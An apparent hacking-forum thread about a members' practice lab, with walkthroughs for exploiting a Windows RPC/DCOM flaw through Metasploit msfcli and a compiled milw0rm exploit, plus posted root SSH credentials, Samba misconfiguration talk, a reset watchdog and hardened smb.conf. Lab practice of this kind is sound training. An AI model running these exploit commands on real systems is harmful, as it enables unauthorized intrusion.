
New Rooting Challenges


ghost:

Alright, so I have set up a lab for you to practice rooting in. I will change the exploit every day or two.

You will need to ssh to my backtrack distro at 75.16.244.69 on port 22. user:root pass:lolpassword

Challenge 2: Medium

Again, exploit the box located at 192.168.5.155 and append your name to the winners.txt file located in the /tmp/I_win/ directory.

Note: This is not a brute-force exercise; the passwords to the machine are over 20 characters long, so don't try. Exploit it another way.

Enjoy

Challenge 1: Easy

You must exploit the OS at 192.168.5.132 and print your name in the "I win.txt" file located on the desktop for credit.

Edit: I figured I would share how to append to a text file, so you don't erase others' names.

echo username >> "I win.txt"

To confirm your name is there:

type "I win.txt"

Please Read: This is a privilege and not a right. I have taken every step I can to ensure the safety of the rest of my network. However, this is not a free-for-all to attack anything. Both the BackTrack and the other OS are VMs. I do ask that you do not even attempt to hack other areas of the network, or I will remove these games. I have granted you a root account on BackTrack; please do not change the password or files, so that others may enjoy it as well. Do whatever attack you think necessary to exploit the allowed machine.


ghost:

Done :D.


ghost:

Sorry JJ, the idea is to use BackTrack to exploit the other operating system at 192.168.5.132, not make a txt file on the BackTrack desktop :)


ghost:

lol…. thought it was far too easy :D

I'll give it another shot :p


ghost:

You do know that once someone exploits the RPC service, it can't be exploited again until it's restarted? I know I can get in via this method, but it's not having it, so I tried NetBIOS, but I'm using Linux and smbclient has been giving me mixed results. I can 'use' the IPC$ share on the vulnerable host, but dir listing is denied, so I can't get any further with that route. The only one left seems to be mstask; I've seen rumors of Perl exploit scripts, but no luck so far, and no version number.

When you set the difficulty as easy, were you expecting these attack vectors to be successful?

Thanks again for providing the box :D


ghost:

Yes, you can exploit the RPC several times. Not sure what type of payloads you're using, but I reset it… Try again; a simple bind shell would probably be the easiest route to take.


DeafCode (root@Alpha.Oddities):

jjbutler88 wrote: lol…. thought it was far too easy :D

I'll give it another shot :p

@jjbutler88 lol I thought this was it at first too


ghost:

Alright, I'm going to write a quick guide to this challenge because it seems that no one has beaten it yet, but several have broken it. I really need to find an auto-timed restarter, but that's beside the point.

Anyway, so you did an nmap scan and found a few open ports, with what each was possibly used for. Good, keep that info.

After searching around Google you find one that's a well-known vulnerability. Lucky for us, we can exploit this in the Metasploit framework. I'm going to use framework 2 for this particular challenge, mostly because the commands are shorter. (Note there's also Meterpreter that you can use for a different feel, but I won't go into that now.)

Navigate to the /pentest/exploits/framework2 directory and we can begin with basic usage of this tool from the CLI.

./msfcli – this lists all the exploits in the framework

./msfcli | grep "some info we got" – helps narrow our field

./msfcli exploit_name – selects the exploit we wish to use

./msfcli exploit_name O – this will list all the options you must fill in to use this exploit; examples would be RHOST and RPORT of the target. It will also show you any default configurations. So let's fill those in:

./msfcli exploit_name RHOST=192.168.5.132 P – the P will output all possible payloads for this exploit

For this example we will use a win32_bind shell.

If you want to know the differences between the payloads, use Google or ask.

So now our exploit looks like this:

./msfcli exploit_name RHOST=192.168.5.132 PAYLOAD=win32_bind E

*The E at the end just tells Metasploit to execute that exploit.

Alright, I have basically just shown you the easiest way to root that box. There are other ways of using this exploit/Metasploit, but it's enough to get you going. All you really need to do is take that line and change exploit_name to the exploit you wish to use from Metasploit.

Have fun


DeafCode (root@Alpha.Oddities):

Fun, that last post did it for me.


ghost:

Alright, it was pointed out that some may not like Metasploit, as you don't know what's going on behind the scenes. I am going to write another one where we compile the source from the milw0rm exploit archives located in the /pentest/exploit directory.

We can view all the exploits listed at /pentest/exploit/milw0rm/sploitlist.txt.

Let's find the one we need from the right directory:

grep -i dcom sploitlist.txt

This will give us a list of available code to choose from. To determine the code you want to use, you will first need to know what operating system you are going to compile the code on. You can determine this from viewing the headers.

For this challenge I'm going to take one I can compile in BackTrack and copy it into the tmp directory:

cp ./platforms/windows/remote/66.c /tmp/

You can view and edit this now with nano /tmp/66.c

This will allow you to see the exploit and how it works, and also make any modifications if you have trouble compiling it or need to alter the shellcode or other important addresses.

gcc -o dcom 66.c  # this will compile the code

./dcom will then show us its usage instructions.

./dcom 1 192.168.5.132  # game over

There, I've now shown you two different ways to go about this: one from Metasploit, one from the code itself.

NOTE: This way will cause the RPC to fail and be unusable a second time; it also will not work if you use it against the wrong operating system, and will cause the right one not to work as well.


ghost:

I tried using Metasploit, but once you have done it once, RPC crashes and is not exploitable again until it is restarted. Perhaps there is a replacement for cron jobs on Windows? To restart the machine / service? Or write a batch file to reboot RPC?

I know Metasploit pretty well, but despite that I wanted to try another way in, as NetBIOS was looking promising, but as of yet I can't find any easy-to-use replacement for something like net use on Windows.

For the next one, maybe install an old FTP server? I wrote a simple fuzzer a while ago, and would love to try it out for real on a target machine, then maybe even write my own exploit code.


ghost:

That's not a bad idea, and I am open to suggestions on different exploits you would like to see.

Also, using the command I showed in my Metasploit post does not require the PC to be restarted; granted, you are right, almost every other one does break. I'm not sure how I would go about writing a reset, but I will probably change it to a more stable exploit area in the near future.


ghost:

What OS are you using? There are schedules on Windows which do the same work as cron. Write a program that restarts RPC, then set it up every hour or so :P


ghost:

Now THAT is a slow connection! Or you downloading something? :ninja:


ghost:

root_op wrote: Now THAT is a slow connection! Or you downloading something? :ninja:

Yeah, not normally as bad, but downloading a movie at this current time ….


ghost:

Well, I rooted the M$ box but lost connection to it when I did Ctrl+C :( Shit, the same. Got some further knowledge on exploiting though :D This inspired me to write an article on how to compile exploits in Cygwin, thanks for your inspiration!


ghost:

As a temporary fix, after you complete the goal, please type the following:

C:\i386\devcon.exe reboot

If anyone would know how to time this or make an if statement with a proper RPC ping, I would love to hear it.
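For the "time this or make an if statement with a proper RPC ping" question in the post above, here is an added example that is not from the thread: a small Python watchdog for a lab owner that probes the target's TCP port and only fires a reset callback after several consecutive failed probes, so a single dropped connection does not reboot the box. The target address is a placeholder and the callback only prints; what the reset actually runs is left to whoever operates the lab.

```python
import socket
import time

def probe_tcp(host, port, timeout=2.0):
    """True if a TCP handshake to host:port completes within timeout seconds."""
    try:
        with socket.create_connection((host, port), timeout=timeout):
            return True
    except OSError:          # refused, unreachable, or timed out
        return False

def should_reset(history, threshold=3):
    """history holds probe results, oldest first.  Reset only after
    `threshold` consecutive failures, so one flaky probe is not enough."""
    if len(history) < threshold:
        return False
    return not any(history[-threshold:])

def watch(host, port, on_down, interval=60, threshold=3, max_rounds=None):
    """Poll host:port every `interval` seconds; call on_down() when
    should_reset() fires, then clear the history so the reset is not
    re-triggered every round.  Returns the number of resets issued
    (max_rounds bounds the loop so it can be exercised in a test)."""
    history, resets, rounds = [], 0, 0
    while max_rounds is None or rounds < max_rounds:
        history.append(probe_tcp(host, port))
        if should_reset(history, threshold):
            on_down()
            resets += 1
            history.clear()
        rounds += 1
        if max_rounds is None or rounds < max_rounds:
            time.sleep(interval)
    return resets

def self_test():
    """Open a throwaway listener on localhost and probe it: exercises the
    success path without touching any real host."""
    with socket.socket() as srv:
        srv.bind(("127.0.0.1", 0))
        srv.listen(1)
        return probe_tcp("127.0.0.1", srv.getsockname()[1], timeout=1.0)

if __name__ == "__main__":
    TARGET = "192.0.2.10"   # placeholder lab address (assumption, not the thread's host)
    # Port 135 is the RPC endpoint mapper the thread keeps crashing.
    watch(TARGET, 135, on_down=lambda: print("RPC down 3 polls in a row: reset the VM"),
          interval=30)
```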


clone4 (Perl-6 Wisdom Seeker):

Maybe a little idea for a tweak: don't you want to put some kind of filtering on the services, to make people use something more 'fancy' than a simple nmap ip etc.?

done…

Also the tutorial posts are worth an article! ;)


ghost:

@clone.

It's good in theory, but keep in mind I'm running those 2 OSes on the same computer that I use on a daily basis, so I'm trying to minimize the resources dedicated to these particular challenges. I am also focusing more on the exploit path, and not as much on the penetration testing part. Basically the idea is nmap for quick info, then research those ports, and use, alter or develop the exploitation path necessary to root the box.

I am currently working on another which will be similar in that the code will be available, but will need to be altered for the particular situation; more details in the near future.

Also nice job, and I see the reboot worked well :)


clone4 (Perl-6 Wisdom Seeker):

stdio wrote: @clone.

It's good in theory, but keep in mind I'm running those 2 OSes on the same computer that I use on a daily basis, so I'm trying to minimize the resources dedicated to these particular challenges. I am also focusing more on the exploit path, and not as much on the penetration testing part. Basically the idea is nmap for quick info, then research those ports, and use, alter or develop the exploitation path necessary to root the box.

I am currently working on another which will be similar in that the code will be available, but will need to be altered for the particular situation; more details in the near future.

Also nice job, and I see the reboot worked well :)

Oh, didn't know that, I thought you were using a separate box… Of course then it's understandable.

Great, looking forward to it.

And yeah, everything went smooth as hell. Btw thanks a lot for this, great experience!!


ghost:

Why not create something new so we might discover some 0days :D


ghost:

That would limit it somewhat, 0-days don't grow on trees :p. If only……

I don't know about everyone else, but I doubt my ability to discover a 0-day in some new(ish) software.


ghost:

Bump for new challenge. And no, it's not a 0-day, but it is at least only a month old, and not really patched yet.

Edit: Instructions on first post.


ghost:

New challenge seems promising really, think I'm missing something though :angry:


ghost:

It's kind of obscure to identify the vulnerability, so if you get stuck feel free to PM me or add me on MSN, and I will try to respond. I won't post the spoilers in this post like I did with the last challenge.

MSN: stdio_h@live.com


clone4 (Perl-6 Wisdom Seeker):

ok done, sick exploit :) but lame question: how the hell do you append in that client? append cmd ain't there, then I thought put might do it, but no. Dunno what cmd to use xD


ghost:

Same way as before:

echo "username" >> winners.txt

and then you can view the results:

cat winners.txt


clone4 (Perl-6 Wisdom Seeker):

Well, either I got in the wrong way or I'm an idiot (2nd more likely) :D but echo gives me "command not found"


ghost:

Yeah, clone4 found a way in due to the fact that NetBIOS/Samba didn't have a password attached to it. Not my intended route, but it did gain access. I am going to fix that problem.
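The "Samba without a password" hole mentioned in the post above is a configuration problem rather than a software bug, so here is an added illustration (constructed for this thread, not the lab's real smb.conf): the guest-accessible setup the post implies, followed by the hardened version of the same two sections. The share name, path, the labusers group and the exact options the lab actually had are assumptions.

```ini
; --- Weak fragment (assumed to resemble what the post describes) ---
; Unknown users are mapped to guest and the share allows guests, so
; anyone on the network can connect and write without credentials.
[global]
   security = user
   map to guest = Bad User
   null passwords = yes

[share]
   path = /tmp/I_win
   guest ok = yes
   writable = yes

; --- Hardened fragment ---
; Every session must authenticate as a real user; unknown users are
; rejected instead of becoming guest, empty passwords are refused, and
; anonymous IPC$ connections (used for share listing) are blocked too.
[global]
   security = user
   map to guest = Never
   null passwords = no
   restrict anonymous = 2

[share]
   path = /tmp/I_win
   guest ok = no
   valid users = @labusers
   writable = yes
```

After changing smb.conf, `testparm` validates the file and `smbclient -L localhost -N` should now fail rather than list shares anonymously.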


clone4 (Perl-6 Wisdom Seeker):

Still haven't found exploit no. 2 :( gonna work on it later


ghost:

Just rooted it, but forgot to exit ssh before I shut my lappy down :(

Sorry everyone, my bad.


ghost:

Yeah, I just saw this; unfortunately I'm at work, so it won't be back up until later tonight (morning for most of you).

Also – jjbutler, learn to put your name on the list… I didn't see it there :)


ghost:

I tried using nano, as well as the method you provided; I was about to check it when I messed up. I'm pretty sure you should have quotes around the username, like this:

echo "jjbutler88" >> "I win.txt"

But I followed your example; I'll try mine when it's back up. I did get in, that's the annoying part :D


ghost:

Yeah, you are right about the quotes, but the file is named differently so you don't have to :P

/tmp/I_win/winners.txt


ghost:

I still dont have access, is it back up yet?


ghost:

Sorry for the long delay, but it's back up and running now.


clone4 (Perl-6 Wisdom Seeker):

stdio wrote: Sorry for the long delay, but it's back up and running now.

yeah, finally :happy::happy:


ghost:

Done :D

Are there other challenges up at the mo? Seems to be more services running than I remember… I've seen some DoS code for the FTP server you have going; obviously I'm not going to DoS you, but I'm gonna rewrite a Python version and share it here :D


ghost:

Yes, I know there is a DoS attack against the FTP server, but I just grabbed a quick box and ran it with defaults. A DoS will not give you root, however; there should be the same number of processes running as before, actually I killed two (smbd, nmbd).